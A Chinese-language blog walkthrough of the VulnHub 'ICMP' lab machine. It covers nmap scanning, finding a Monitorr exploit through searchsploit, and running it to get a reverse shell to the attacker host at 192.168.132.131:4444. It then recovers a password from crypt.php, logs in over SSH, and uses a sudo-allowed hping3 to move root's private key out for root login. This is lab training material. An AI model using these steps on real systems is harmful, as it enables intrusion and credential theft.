VulnHub-ICMP

环境


Kali: 192.168.132.131

靶机:192.168.132.145 靶机地址:https://www.vulnhub.com/entry/icmp-1,633/

一、信息收集


nmap -sP 192.168.132.0/24

nmap -p- -sC -sV 192.168.132.145

http://192.168.132.145/mon/

http://192.168.132.145/mon/settings.php

二、漏洞探测


searchsploit Monitorr

三、漏洞验证


进行反弹shell

python 48980.py http://192.168.132.145/mon/ 192.168.132.131 4444

获得shell

查看当前用户id

查看home中的问及那

crypt() 返回一个基于标准 UNIX DES 算法或系统上其他可用的替代算法的散列字符串

使用crypy()函数对密码进行加密,可以判断除图片中为fox用户的未加密前的原始密码

cat devel/crypt.php

尝试登录

ssh fox@192.168.132.145

找到部分flag

四、提权


检查当前用户是否存在高权限命令

sudo -l

进入root用户,存在密钥文件

无法查看私钥

在开启一个终端,在两个终端之间,通过hping3高权限命令,进行传输私钥进行查看

第一个终端

第二个终端

获得私钥,我们可以以 root 身份登录

获得root权限

五、总结


这套靶机难易程度容易,使用nmap扫描靶机,发现22、80端口,访问网站,发现网页存在插件,使用searchspoilt工具搜索该插件可以利用漏洞,存在可以利用漏洞,验证漏洞,利用漏洞,获得shell,存在sudo的hping3高权限命令,借助该命令,将私钥传输到攻击机,使用靶机私钥进行登录。

posted @ 2021-09-24 21:02  纸机  阅读(140)  评论(0编辑  收藏  举报